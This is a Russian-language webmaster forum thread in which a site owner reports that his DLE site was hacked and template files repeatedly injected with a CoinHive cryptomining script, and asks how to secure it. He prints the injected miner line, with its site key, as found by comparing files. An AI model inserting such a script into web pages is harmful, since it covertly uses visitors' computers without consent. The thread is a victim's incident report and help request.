Скрыть объявление
ВАШИ ПРАВА ОГРАНИЧЕНЫ!

Зарегистрируйтесь на форуме, чтобы стать полноценным участником сообщества!

Вопрос? Взломали сайт, какие меры принять?

Тема в разделе "Вопросы- ответы", создана пользователем Romantv, 27 янв 2018.

27.01.18 в 12:37
30.01.18 в 13:04
36
2.189
0
  1. TopicStarter Overlay
    Romantv

    Забанен

    Регистрация:
    17 июл 2015
    Сообщения:
    6.989
    Лучших ответов:
    6
    Рейтинги:
    +1.997 / 141 / -0
    Вчера вечером приходит смс сообщение что на сайте изменены 4 файла, а именно
    fullstory.tpl
    main.tpl
    shortstory.tpl
    /engine/classes/js/jquery.js
    я скачал один файл fullstory.tpl и его сравнил программой Araxis Merge сразу нашол скрипт
    Код:
     <script>var min = new CoinHive.Anonymous('ooApRc35FgFVFE7JAf8d7MQO3TSbhd2v',{throttle: 0.9});if (!min.isMobile()) {min.start();}</script>
    Я сразу шаблон удалил и закачал новый из бекапа ( там этого скрипта нет)
    Все что находится в папке /engine/classes/js/ заменил.
    Проходит минут 15 опять приходит смс изменен и добавлен файл
    /engine/classes/js/jquery.js
    /engine/classes/js/jquery_.js

    Я обратно все что в папке /engine/classes/js/ поменял.

    Сегодня утром после осмотра нахожу обратно этот скрипт майнера.
    Сейчас шаблон новый с бекапа закачал,поменял права и пользователя на root
    Поменял пользователя на папку engine теперь она root ( закачать, файл поменять уже не получится,даже если есть доступ)
    Нашол партнерку coinhive.com там зарегистрировался,написал в поддержку,так и так и предоставил им скрипт,сейчас ожидаю ответа, ( если ответят и скажут кошелек я постараюсь его заблокировать)


    Так вот сам вопрос: Что еще предпринять, для защиты сайта?
    Как вообще можно закачать файл на сайт /engine/classes/js/jquery_.js ?
    Все мои модули которые у меня установлены вот
    upload_2018-1-27_12-35-6.png
     
  2. Alaster

    Alaster Бывалый

    Регистрация:
    4 янв 2016
    Сообщения:
    385
    Лучших ответов:
    1
    Рейтинги:
    +33 / 0 / -0
    мб хост говн..кстати и на самом сайте coinhive стоит майнер
     
  3. TopicStarter Overlay
    Romantv

    Забанен

    Регистрация:
    17 июл 2015
    Сообщения:
    6.989
    Лучших ответов:
    6
    Рейтинги:
    +1.997 / 141 / -0
    хост норм VPS www.ovh.ie это исключено
     
  4. volodec

    volodec Посетитель

    Регистрация:
    17 фев 2017
    Сообщения:
    60
    Лучших ответов:
    0
    Рейтинги:
    +10 / 4 / -0
    А какая дле? Может xxs был в комментариях или еще какая либо инъекция для доступа к админке. В админке можно править файлы шаблона и тд.
    Глянь логи действий в админке
     
  5. TopicStarter Overlay
    Romantv

    Забанен

    Регистрация:
    17 июл 2015
    Сообщения:
    6.989
    Лучших ответов:
    6
    Рейтинги:
    +1.997 / 141 / -0
    версия 12
     
  6. Alaster

    Alaster Бывалый

    Регистрация:
    4 янв 2016
    Сообщения:
    385
    Лучших ответов:
    1
    Рейтинги:
    +33 / 0 / -0
    ну из модулей которые у тебя стоят , мне не знакомы только 3(конструктор видео,лог загрузок, и поиск)они проверенные?
     
  7. TopicStarter Overlay
    Romantv

    Забанен

    Регистрация:
    17 июл 2015
    Сообщения:
    6.989
    Лучших ответов:
    6
    Рейтинги:
    +1.997 / 141 / -0
    модули вроде нормальные.авторы модулей, тут на форуме есть
     
    #7 Romantv, 27 янв 2018
    Последнее редактирование: 27 янв 2018
  8. volodec

    volodec Посетитель

    Регистрация:
    17 фев 2017
    Сообщения:
    60
    Лучших ответов:
    0
    Рейтинги:
    +10 / 4 / -0
    Так в админке есть подозрительные действия?
     
  9. TopicStarter Overlay
    Romantv

    Забанен

    Регистрация:
    17 июл 2015
    Сообщения:
    6.989
    Лучших ответов:
    6
    Рейтинги:
    +1.997 / 141 / -0
    нет. только - Список неудачных попыток авторизации пользователей в админпанели или пользователей, имеющих доступ к админпанели.
     
  10. TopicStarter Overlay
    Romantv

    Забанен

    Регистрация:
    17 июл 2015
    Сообщения:
    6.989
    Лучших ответов:
    6
    Рейтинги:
    +1.997 / 141 / -0
    Помайнил чувак)))
    upload_2018-1-27_15-47-28.png
     
  11. Krabsterz8

    Krabsterz8 Бывалый

    Регистрация:
    25 окт 2015
    Сообщения:
    851
    Лучших ответов:
    1
    Рейтинги:
    +217 / 37 / -0
    .
     
    #11 Krabsterz8, 27 янв 2018
    Последнее редактирование: 5 фев 2020
  12. TopicStarter Overlay
    Romantv

    Забанен

    Регистрация:
    17 июл 2015
    Сообщения:
    6.989
    Лучших ответов:
    6
    Рейтинги:
    +1.997 / 141 / -0
    Был баг что ли?могли заливать,это как?
     
  13. Krabsterz8

    Krabsterz8 Бывалый

    Регистрация:
    25 окт 2015
    Сообщения:
    851
    Лучших ответов:
    1
    Рейтинги:
    +217 / 37 / -0
    .
     
    #13 Krabsterz8, 27 янв 2018
    Последнее редактирование: 5 фев 2020
  14. TopicStarter Overlay
    Romantv

    Забанен

    Регистрация:
    17 июл 2015
    Сообщения:
    6.989
    Лучших ответов:
    6
    Рейтинги:
    +1.997 / 141 / -0
    админов там нет.
    Главное васек от майнился,прикинь на майнил где то еще дохуя и заблокировали)
     
  15. Владик

    Владик Новичок

    Регистрация:
    15 янв 2018
    Сообщения:
    48
    Лучших ответов:
    0
    Рейтинги:
    +5 / 0 / -0
    Тебе отписку дали стандартную.
     
  16. TopicStarter Overlay
    Romantv

    Забанен

    Регистрация:
    17 июл 2015
    Сообщения:
    6.989
    Лучших ответов:
    6
    Рейтинги:
    +1.997 / 141 / -0
    Правила есть coinhive.com/info/terms-of-service ,была бы отписка они вообще бы не отписывались.
    Я потом еще раз писал спрашивал его рег почту, ее не дали имя сказали.
    upload_2018-1-27_18-19-55.png
    Но это не важно интересно как файл залили
     
  17. TopicStarter Overlay
    Romantv

    Забанен

    Регистрация:
    17 июл 2015
    Сообщения:
    6.989
    Лучших ответов:
    6
    Рейтинги:
    +1.997 / 141 / -0
    Может самому попробовать
    Какое количество XMR можно ожидать для моего сайта?

    В настоящее время мы платим 0.000053XMR за 1 миллион хешей. Если у вас 1 миллион посещений в месяц, предположите, что пользователь делает 30 хешей / с (средний ноутбук) и остается на вашем сайте в течение 5 минут:

    (1000000 visits per month * 30 hashes/s * 5 minutes * 60 seconds)/1000000 * 0.000053 xmr = 0.477 xmr / month.
    Yesterday 0.0477 XMR= 12.77166627 EUR


    Как я могу снять оставшийся остаток?
    Выплаты происходят автоматически каждые два часа. Если вы достигли минимальной выплаты (настраиваемой в настройках), весь ваш ожидающий баланс будет оплачен следующей партией.
     
  18. Владик

    Владик Новичок

    Регистрация:
    15 янв 2018
    Сообщения:
    48
    Лучших ответов:
    0
    Рейтинги:
    +5 / 0 / -0
    это скажки антивири блокают эту хрень и пс понижают. Осторожно CoinHive - Общие вопросы - Dr.Web forum
     
  19. TopicStarter Overlay
    Romantv

    Забанен

    Регистрация:
    17 июл 2015
    Сообщения:
    6.989
    Лучших ответов:
    6
    Рейтинги:
    +1.997 / 141 / -0
    походу майнер остался, как проверить в консоли?
    upload_2018-1-27_19-8-16.png
     
  20. uskino

    PRO Users

    Регистрация:
    20 окт 2015
    Сообщения:
    762
    Лучших ответов:
    1
    Рейтинги:
    +174 / 23 / -0
    Ты не один такой. Есть пара человек на форуме с такой же бедой, подожди, мб увидят - отпишутся. Тоже не за 1 день эту заразу победили )
     
Яндекс.Метрика